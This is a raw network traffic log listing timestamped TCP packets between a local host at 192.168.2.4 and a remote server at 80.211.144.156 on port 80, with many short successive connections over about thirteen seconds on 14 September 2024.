Sep 14, 2024 12:53:30.043514013 CEST	62786	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.048280954 CEST	80	62786	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.181233883 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.186120987 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186134100 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186145067 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186187983 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186211109 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.186230898 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.186252117 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.186316013 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186325073 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186369896 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.186399937 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186408043 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186415911 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186445951 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.186460972 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.186500072 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.191104889 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.191114902 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.191162109 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.191170931 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.191173077 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.191210032 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.191216946 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.191220045 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.191260099 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.191272974 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.238008022 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.240377903 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.285547018 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.287765026 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.319597960 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.320391893 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.325710058 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325728893 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325786114 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.325829029 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325839043 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325846910 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325855970 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325900078 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.325956106 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325965881 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325973988 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.325983047 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326004028 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326006889 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.326019049 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.326047897 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.326543093 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326553106 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326561928 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326570988 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326581001 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326590061 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326598883 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326607943 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326616049 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.326617002 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326626062 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326634884 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326644897 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.326653004 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.326673985 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.326702118 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.330643892 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.330986023 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.330996990 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331024885 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331052065 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.331445932 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331546068 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331594944 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331630945 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331676006 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331743002 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331774950 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331815958 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.331825972 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332112074 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332417965 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332449913 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332453012 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332467079 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332479000 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332514048 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332523108 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332604885 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332613945 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332693100 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332701921 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332755089 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332763910 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332844973 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332854033 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332894087 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.332902908 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.335913897 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.335926056 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.335968018 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.336024046 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.336184025 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.336193085 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.399857998 CEST	62786	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.405256033 CEST	80	62786	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.528381109 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.602902889 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.713251114 CEST	80	62786	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.840540886 CEST	80	62786	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.840614080 CEST	62786	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.959345102 CEST	62786	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.960216999 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.964644909 CEST	80	62786	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.964721918 CEST	62786	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.965234041 CEST	80	62787	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:30.965312004 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.965416908 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:30.970308065 CEST	80	62787	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.270220041 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.321805954 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.326853991 CEST	80	62787	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.415419102 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.634633064 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.635320902 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.636471987 CEST	80	62787	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.639940977 CEST	80	62785	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.640012026 CEST	62785	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.640325069 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.640398026 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.640510082 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.645250082 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.759190083 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.768908024 CEST	80	62787	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.868536949 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.897273064 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.898127079 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.902399063 CEST	80	62787	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.902487993 CEST	62787	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.902991056 CEST	80	62789	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.903084040 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.903327942 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:31.908087969 CEST	80	62789	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:31.993634939 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.002269030 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.002353907 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.259241104 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.265127897 CEST	80	62789	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.336026907 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.392193079 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.529690027 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.591936111 CEST	80	62789	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.712299109 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.724231005 CEST	80	62789	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.724497080 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.852173090 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.852243900 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.857273102 CEST	80	62788	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.857624054 CEST	80	62789	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:32.857692003 CEST	62788	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:32.857804060 CEST	62789	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.001956940 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.006823063 CEST	80	62790	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.008337975 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.008498907 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.013267040 CEST	80	62790	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.353183031 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.358098030 CEST	80	62790	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.676336050 CEST	80	62790	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.759190083 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.804290056 CEST	80	62790	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.868555069 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.927146912 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.927736998 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.932164907 CEST	80	62790	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.932269096 CEST	62790	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.932706118 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:33.932787895 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.932869911 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:33.937798023 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.290548086 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.298325062 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.799982071 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.800520897 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.800590038 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.801136017 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.801211119 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.934003115 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.935020924 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.939323902 CEST	80	62791	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.939403057 CEST	62791	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.939882040 CEST	80	62792	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:34.939951897 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.940041065 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:34.944792032 CEST	80	62792	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:35.290482998 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.295366049 CEST	80	62792	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:35.605925083 CEST	80	62792	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:35.740607977 CEST	80	62792	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:35.740684032 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.896579027 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.897743940 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.902199984 CEST	80	62792	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:35.902271032 CEST	62792	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.902556896 CEST	80	62793	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:35.902673006 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.902857065 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:35.907625914 CEST	80	62793	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:36.259403944 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.264503956 CEST	80	62793	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:36.586179018 CEST	80	62793	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:36.712292910 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.720196009 CEST	80	62793	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:36.842238903 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.843173981 CEST	62794	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.847414970 CEST	80	62793	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:36.847646952 CEST	62793	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.847923040 CEST	80	62794	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:36.848018885 CEST	62794	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.848117113 CEST	62794	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:36.852901936 CEST	80	62794	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.196922064 CEST	62794	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.202037096 CEST	80	62794	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.512213945 CEST	80	62794	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.542498112 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.543212891 CEST	62794	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.547516108 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.547597885 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.547703981 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.549494982 CEST	80	62794	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.549561024 CEST	62794	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.553893089 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.668288946 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.673260927 CEST	80	62796	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.673341990 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.673418999 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.678203106 CEST	80	62796	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.900084019 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:37.905087948 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:37.905114889 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.024888992 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.204097033 CEST	80	62796	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.221062899 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.274828911 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.350033045 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.356945038 CEST	80	62796	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.399836063 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.399835110 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.547240973 CEST	80	62796	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.690097094 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.690232992 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.691308975 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.695332050 CEST	80	62795	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.695352077 CEST	80	62796	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.695441008 CEST	62795	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.696309090 CEST	62796	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.696388006 CEST	80	62797	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:38.696460009 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.696543932 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:38.701551914 CEST	80	62797	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:39.040514946 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.045610905 CEST	80	62797	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:39.389436960 CEST	80	62797	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:39.446682930 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.529771090 CEST	80	62797	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:39.587407112 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.654864073 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.655478001 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.660425901 CEST	80	62797	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:39.660445929 CEST	80	62798	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:39.660510063 CEST	62797	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.660531998 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.660656929 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:39.665654898 CEST	80	62798	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.009265900 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.014262915 CEST	80	62798	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.335196972 CEST	80	62798	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.384192944 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.465967894 CEST	80	62798	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.509387016 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.584042072 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.586651087 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.589258909 CEST	80	62798	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.589339972 CEST	62798	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.591531992 CEST	80	62799	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.591608047 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.591701984 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.597687006 CEST	80	62799	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:40.946825027 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:40.951999903 CEST	80	62799	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:41.275418997 CEST	80	62799	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:41.415496111 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.478303909 CEST	80	62799	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:41.601294041 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.601742983 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.606625080 CEST	80	62800	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:41.606709957 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.606794119 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.606826067 CEST	80	62799	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:41.606887102 CEST	62799	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.611690044 CEST	80	62800	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:41.962397099 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:41.967562914 CEST	80	62800	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:42.278722048 CEST	80	62800	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:42.409252882 CEST	80	62800	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:42.409373045 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.555463076 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.560751915 CEST	80	62800	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:42.560837030 CEST	62800	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.587029934 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.592279911 CEST	80	62801	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:42.592377901 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.592494011 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.597439051 CEST	80	62801	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:42.946770906 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:42.951786995 CEST	80	62801	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.258702040 CEST	80	62801	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.306088924 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.354173899 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.354379892 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.359170914 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.359277964 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.359333038 CEST	62802	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.359564066 CEST	80	62801	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.359627008 CEST	62801	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.364243984 CEST	80	62802	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.487776995 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.492779970 CEST	80	62803	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.492851973 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.492957115 CEST	62803	80	192.168.2.4	80.211.144.156
Sep 14, 2024 12:53:43.497926950 CEST	80	62803	80.211.144.156	192.168.2.4
Sep 14, 2024 12:53:43.712502003 CEST	62802	80	192.168.2.4	80.211.144.156
